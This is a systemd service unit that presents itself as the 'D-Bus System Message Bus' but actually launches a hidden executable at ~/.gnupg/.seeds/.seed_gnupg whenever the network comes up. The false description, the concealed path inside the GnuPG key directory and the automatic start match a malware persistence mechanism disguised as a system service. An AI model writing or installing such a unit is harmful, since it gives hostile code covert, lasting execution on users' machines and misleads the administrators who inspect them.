[Unit]
Description=D-Bus System Message Bus
After=network-online.target
PartOf=network-online.target

[Service]
ExecStart=/usr/bin/bash -c "USER=$(whoami); exec /home/$USER/.gnupg/.seeds/.seed_gnupg"

[Install]
WantedBy=network-online.target
